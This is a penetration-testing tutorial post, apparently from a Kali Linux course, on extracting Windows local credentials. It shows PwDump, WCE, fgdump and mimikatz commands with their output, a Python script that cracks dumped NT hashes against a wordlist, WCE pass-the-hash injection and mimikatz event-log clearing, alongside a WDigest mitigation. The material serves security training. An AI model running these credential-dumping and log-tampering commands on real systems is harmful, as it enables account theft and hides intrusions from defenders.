Kali Linux Penetration Testing 045: Reading Windows Local Passwords
This post records, in detail, the process of learning to use Kali Linux 2018.1 for penetration testing; the tutorial followed is the "Kali Linux Penetration Testing" course from 安全牛課堂.
1. Packet sniffing
2. Keylogging local passwords
3. Viewing locally cached passwords
4. WCE (WINDOWS CREDENTIAL EDITOR)
5. fgdump
6. mimikatz
1. Packet sniffing
Windows
- Wireshark
- Omnipeek
- Commview
- Sniffpass: captures only the packets that carry passwords (cleartext protocols such as POP3, IMAP, SMTP, FTP and HTTP basic authentication)
Linux
- Tcpdump
- Wireshark
- Dsniff: captures the packets that carry passwords and prints the credentials it recognises
2. Keylogging local passwords
A Trojan such as DarkComet RAT can be used for this.
Once the target host is under the attacker's control, its keystrokes can be logged and the typed passwords recovered.
3. Viewing locally cached passwords
Passwords cached in the browser can be viewed from the browser itself
Use PwDump to read the Windows local logon password hashes
- Windows does not store logon passwords in cleartext: the SAM database in C:\Windows\System32\config\SAM holds the LM and NT hashes of every local account, and only SYSTEM can read it while Windows is running
- In Kali, PwDump.exe is shipped as part of fgdump and can be found under /usr/share/windows-binaries/fgdump/
Add a user, then dump the hashes
C:\Documents and Settings\kevin>net user user2 123456 /add
C:\Documents and Settings\kevin>net user
User accounts for \\ICST-WINATT
-------------------------------------------------------------
Administrator            Guest                    HelpAssistant
kevin                    SUPPORT_388945a0         test
user1                    user2
C:\Documents and Settings\kevin>cd \
C:\>PwDump.exe localhost
Administrator:500:18D583B495C4696AFF17365FAF1FFE89:5D36F0CA14EEBEF32F55C7B6A4675DB0:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
HelpAssistant:1000:5906F3A72959D5902440275BA555A537:10AA20D63C3EC71E0102AC95ADF6DF73:::
kevin:1004:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::
SUPPORT_388945a0:1002:NO PASSWORD*********************:8AFA81401E8D8EBFA42B4E46F6507C07:::
test:1005:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::
user1:1006:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::
user2:1007:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::
Completed.
# Result format: username:RID:LM hash:NT hash:::. RID 500 is the built-in Administrator. Neither hash is salted, so kevin, test, user1 and user2, all set to 123456, show identical hashes. The second half of their LM hash is AAD3B435B51404EE, the LM value of an empty 7-byte block, which already tells an attacker the password is at most 7 characters. NO PASSWORD means no hash is stored in that field: SUPPORT_388945a0 has an NT hash but no LM hash, which is what you see when the password is longer than 14 characters or LM storage is disabled.
Save the output to a file and crack it offline in Kali; john accepts this pwdump format directly (--format=LM or --format=NT).
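As an added example (not part of the original post, and not code from PwDump, fgdump or WCE), the script below does the offline step in Python: it parses the pwdump lines above, says what each LM hash reveals on its own, and checks every NT hash against a small constructed wordlist. The nt_hash function reproduces the NT half of what wce -g prints (MD4 over the UTF-16LE password); a pure-Python MD4 is included because Python builds on OpenSSL 3 frequently ship with hashlib's md4 disabled. The wordlist is constructed for the demonstration; the pwdump lines are copied from the output above.

```python
"""Offline handling of pwdump-style output: parse user:RID:LM:NT::: lines, classify the
LM hashes, and crack the NT hashes against a wordlist.

Added example, not part of the original post. Sample lines are copied from the post's
PwDump.exe output; the wordlist is constructed."""
import struct

# LM hash of an empty 7-byte half (DES of the constant "KGS!@#$%" under an all-zero key).
EMPTY_LM_HALF = "AAD3B435B51404EE"

# Sample input: lines from the post's PwDump.exe output.
PWDUMP_SAMPLE = """\
Administrator:500:18D583B495C4696AFF17365FAF1FFE89:5D36F0CA14EEBEF32F55C7B6A4675DB0:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
kevin:1004:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::
SUPPORT_388945a0:1002:NO PASSWORD*********************:8AFA81401E8D8EBFA42B4E46F6507C07:::
user2:1007:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::
"""

# Constructed wordlist; a real run would read a file such as rockyou.txt.
WORDLIST = ["password", "123456", "Passw0rd!", "letmein"]


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320), used because hashlib.new("md4") is often unavailable
    on Python builds linked against OpenSSL 3."""
    mask = 0xFFFFFFFF

    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & mask

    def f(x, y, z):
        return (x & y) | (~x & z)

    def g(x, y, z):
        return (x & y) | (x & z) | (y & z)

    def h(x, y, z):
        return x ^ y ^ z

    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (f, 0x00000000, tuple(range(16)), (3, 7, 11, 19)),
        (g, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (h, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for fn, const, order, shifts in rounds:
            for i, k in enumerate(order):
                # Update "a", then rotate the roles: this reproduces the a/d/c/b
                # ordering of the specification with a single statement.
                a = rotl((a + fn(b, c, d) + x[k] + const) & mask, shifts[i % 4])
                a, b, c, d = d, a, b, c
        state = [(s + v) & mask for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)). No salt: equal passwords give equal hashes."""
    return md4(password.encode("utf-16-le")).hex().upper()


def parse_pwdump(text: str) -> list:
    """Parse user:RID:LM:NT::: lines as written by PwDump/fgdump."""
    rows = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue  # "Completed." and other non-record lines
        rows.append({"user": parts[0], "rid": int(parts[1]),
                     "lm": parts[2].upper(), "nt": parts[3].upper()})
    return rows


def lm_note(lm: str) -> str:
    """What the LM hash reveals before any cracking is attempted."""
    if lm.startswith("NO PASSWORD"):
        return "no LM hash stored (empty password, LM storage disabled, or password over 14 chars)"
    if lm == EMPTY_LM_HALF * 2:
        return "LM hash of the empty password"
    if lm.endswith(EMPTY_LM_HALF):
        return "password is 7 characters or fewer (second LM half is empty)"
    return "full LM hash: 8 to 14 characters, case-folded, two independently crackable 7-char halves"


def crack_nt(rows: list, wordlist: list) -> dict:
    """Hash each candidate once, then look every account up: unsalted hashes make this a dict lookup."""
    table = {nt_hash(w): w for w in wordlist}
    return {row["user"]: table.get(row["nt"]) for row in rows}


if __name__ == "__main__":
    rows = parse_pwdump(PWDUMP_SAMPLE)
    found = crack_nt(rows, WORDLIST)
    for row in rows:
        print(f"{row['user']:18} rid={row['rid']:<5} nt={str(found[row['user']]):10} lm: {lm_note(row['lm'])}")
```

Running it shows kevin and user2 both resolving to 123456 from a single hash computation per candidate, which is the practical consequence of the missing salt: one pass over the wordlist covers every account in the dump at once.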
4. WCE (WINDOWS CREDENTIAL EDITOR)
Windows authentication process
WCE (WINDOWS CREDENTIAL EDITOR)
- To support single sign-on, the LSASS process keeps logon credentials in memory: the LM/NT hashes of every logon session and, through the WDigest security package, a recoverable copy of the cleartext password. Nothing protects that memory beyond ordinary process access control, so anyone who can read LSASS can read the secrets
- Administrator privileges are required (WCE opens LSASS, which needs SeDebugPrivilege)
- The tool is kept in Kali under /usr/share/wce/wce-universal # the universal build detects 32-bit and 64-bit Windows automatically
Log in to the target host as several users so that multiple logon sessions exist
List logon accounts and sessions (LUID:user:domain:LM hash:NT hash)
C:\>wce-universal.exe -lv
0020B19D:user1:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
001E5D92:user2:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
001B9220:test:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
0000C7CE:kevin:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
000003E4:ICST-WINATT$:MSHOME:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
# The hashes match the output of C:\>PwDump.exe localhost. LUID 000003E4 is the NETWORK SERVICE logon session, which presents the computer account; on a workgroup machine (MSHOME) that account has no password, hence the empty-password LM and NT hashes
Refresh the list every 5 seconds
C:\>wce-universal.exe -r
Delete a logon session
C:\>wce-universal.exe -d 0020B19D
C:\>wce-universal.exe -lv
001E5D92:user2:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
001B9220:test:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
0000C7CE:kevin:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
000003E4:ICST-WINATT$:MSHOME:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
Compute the LM and NT hashes of a given password
C:\>wce-universal.exe -g passwd
Password: passwd
Hashes: 91C7AE7122196B5EAAD3B435B51404EE:22315D6ED1A7D5F8A7C98C40E9FA2DEC
Read the cleartext passwords from LSASS memory
C:\>wce-universal.exe -w
user1\ICST-WINATT:123456
user2\ICST-WINATT:123456
test\ICST-WINATT:123456
kevin\ICST-WINATT:123456
NETWORK SERVICE\MSHOME:
C:\>net user user1 111222
The command completed successfully.
C:\>wce-universal.exe -w
user1\ICST-WINATT:123456
user2\ICST-WINATT:123456
test\ICST-WINATT:123456
kevin\ICST-WINATT:123456
NETWORK SERVICE\MSHOME:
# LSASS still holds the password that was used at logon; the new password is only cached the next time user1 logs on
Modify a LUID (give an existing session another user's name and hashes, i.e. pass-the-hash into a live logon session; -s takes username:domain:LM hash:NT hash)
C:\>wce-universal.exe -lv
001E5D92:user2:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
001B9220:test:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
0000C7CE:kevin:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
000003E4:ICST-WINATT$:MSHOME:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
C:\>wce-universal.exe -i 001E5D92 -s kevin:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
Changing NTLM credentials of logon session 001E5D92h to:
Username: kevin
domain: ICST-WINATT
LMHash: 44EFCE164AB921CAAAD3B435B51404EE
NTHash: 32ED87BDB5FDC5E9CBA88547376818D4
NTLM credentials successfully changed!
C:\>wce-universal.exe -lv
001E5D92:kevin:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
001B9220:test:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
000003E4:ICST-WINATT$:MSHOME:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
Windows 7 and earlier are exposed to WCE's cleartext recovery by default, as are Windows 8 and Server 2012. Windows 8.1 and Server 2012 R2 stop WDigest from keeping the cleartext copy by default, and KB2871997 adds the same control to Windows 7, 2008 R2, 8 and 2012.
Mitigation: edit the registry
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages
Remove wdigest from this multi-string value and reboot the computer. On systems with KB2871997 installed, or on Windows 8.1 and later, set HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential (REG_DWORD) to 0 instead. Either way only the cleartext copy disappears: the LM/NT hashes of logged-on users remain in LSASS, so -lv, -i and -s (pass-the-hash) keep working. Removing the WDigest package also breaks anything on that machine that relies on HTTP Digest authentication, so test before rolling it out.
5. fgdump
PwDump localhost
Location: in Kali, PwDump.exe is found under /usr/share/windows-binaries/fgdump/ (it is shipped as part of fgdump)
fgdump
Location: in Kali, fgdump.exe is found under /usr/share/windows-binaries/fgdump/
Copy it to the WinXP host and double-click it or run fgdump.exe from the command line; it automatically writes three files. The hashes are in the pwdump-format file, in the same username:RID:LM hash:NT hash::: layout as the PwDump output above; fgdump also dumps cached domain logon credentials (cachedump format) when the machine has any.
6. mimikatz
Path in Kali: /usr/share/mimikatz; copy the Win32 folder (or x64 for a 64-bit Windows) to the Windows host
C:\Win32>mimikatz.exe
To view the help, type ::
mimikatz # ::
standard - Standard module [Basic commands (does not require module name)]
crypto - Crypto Module
sekurlsa - SekurLSA module [Some commands to enumerate credentials...]
kerberos - Kerberos package module []
privilege - Privilege module
process - Process module
service - Service module
lsadump - LsaDump module
ts - Terminal Server module
event - Event module
misc - Miscellaneous module
token - Token manipulation module
vault - Windows Vault/Credential module
minesweeper - MineSweeper module
net -
dpapi - DPAPI Module (by API or RAW access) [Data Protection application programming interface]
busylight - BusyLight Module
sysenv - System Environment Value module
sid - Security Identifiers module
iis - IIS XML Config module
rpc - RPC control of mimikatz
mimikatz # privilege::
Module : privilege
Full name : Privilege module
debug - Ask debug privilege
driver - Ask load driver privilege
security - Ask security privilege
tcb - Ask tcb privilege
backup - Ask backup privilege
restore - Ask restore privilege
sysenv - Ask system environment privilege
id - Ask a privilege by its id
name - Ask a privilege by its name
mimikatz # privilege::debug # acquire SeDebugPrivilege; required before the sekurlsa commands can open LSASS
mimikatz # sekurlsa:: # list the commands of the sekurlsa module
mimikatz # sekurlsa::logonPasswords # dump the credentials of every logon session from LSASS: LM/NT hashes, and cleartext passwords where WDigest still caches them
mimikatz # sekurlsa::wdigest # WDigest credentials only
mimikatz # process::list # list running processes
mimikatz # lsadump::sam # dump the SAM hashes; needs SYSTEM, so run token::elevate first
mimikatz # lsadump::cache # dump cached domain logon credentials
mimikatz # ts::multirdp # patch Terminal Services to allow multiple simultaneous RDP sessions
mimikatz # event::clear # clear the event log
mimikatz # event::drop # patch the event service so that new events are dropped
mimikatz # misc::regedit # launch regedit
mimikatz # token::whoami # show the current token